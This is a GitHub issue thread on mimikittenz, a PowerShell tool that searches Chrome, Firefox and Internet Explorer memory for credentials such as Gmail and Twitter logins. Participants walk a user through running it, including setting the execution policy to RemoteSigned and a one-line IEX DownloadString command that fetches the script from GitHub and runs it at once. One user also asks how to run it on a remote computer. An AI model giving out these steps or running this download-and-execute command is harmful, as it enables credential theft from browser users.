### ISSUE TITLE
How run it

### ISSUE THREAD

**Issue by tieuhodo** [putterpanda/mimikittenz#2]
I try run it on Win7x64 but it don't show result

**Comment by tieuhodo** [comment]
Please help me!!

**Comment by scopolamin** [comment]
same

**Comment by orlyjamie** [comment]
What are you trying to pull from memory (Gmail, Twitter credentials etc)? What is the target process (Chrome, FF, IE etc)?

**Comment by scopolamin** [comment]
The functions is never called ... so you've 3 options:

1) Call the function from the file (=> last line)

```
function Invoke-mimikittenz
{
  /* code */
  write-output $asciiart
  $matches=[mimikittenz.MemProcInspector]::InspectManyProcs("iexplore","chrome","firefox")

  write-output $matches
}

Invoke-mimikittenz
```

2) Invoke the functions from the file

PS C:> **powershell -command "& { . C:\foo\bar\Invoke-mimikittenz.ps1; Invoke-mimikittenz }"**

3) Load the file and call the function

PS C:\foo\bar> **. .\Invoke-mimikittenz.ps1**
PS C:\foo\bar> **Invoke-mimikittenz**

**Comment by scopolamin** [comment]
The script needs some time - but it works!!

**Comment by tieuhodo** [comment]
![powershell](https://cloud.githubusercontent.com/assets/10146355/16657232/ee227a12-448b-11e6-962c-44fb23faffb3.png)

**Comment by tieuhodo** [comment]
how try it?? i don't know fix.. Help me!! Thanks

**Comment by scopolamin** [comment]
PS C:> **Set-ExecutionPolicy RemoteSigned**

**Comment by scopolamin** [comment]
http://www.howtogeek.com/106273/how-to-allow-the-execution-of-powershell-scripts-on-windows-7/

**Comment by orlyjamie** [comment]
PS execution policy is default restrictive, besides changing your execution policy you can run the following single command: 

`IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1'));Invoke-mimikittenz`

_Note: Be patient and wait for the output, the more tabs you have open the longer it's going to take._

**Comment by tieuhodo** [comment]
How run it on remote computer with command full

**Comment by tieuhodo** [comment]
![powershell](https://cloud.githubusercontent.com/assets/10146355/16657978/bec1af42-448e-11e6-97fe-55d518118aa4.png)

**Comment by tieuhodo** [comment]
![powershell](https://cloud.githubusercontent.com/assets/10146355/16658033/fa0a11ac-448e-11e6-9e0f-e92f6b03a40c.png)

**Comment by orlyjamie** [comment]
That's good, let it run - Leave it for up to 3-5 minutes if you have to.

**Comment by tieuhodo** [comment]
if i download it and run?? What list commands i must run?? Thanks

**Comment by orlyjamie** [comment]
You invoke the function `Invoke-mimikittenz` - I already included this in my comment for you.
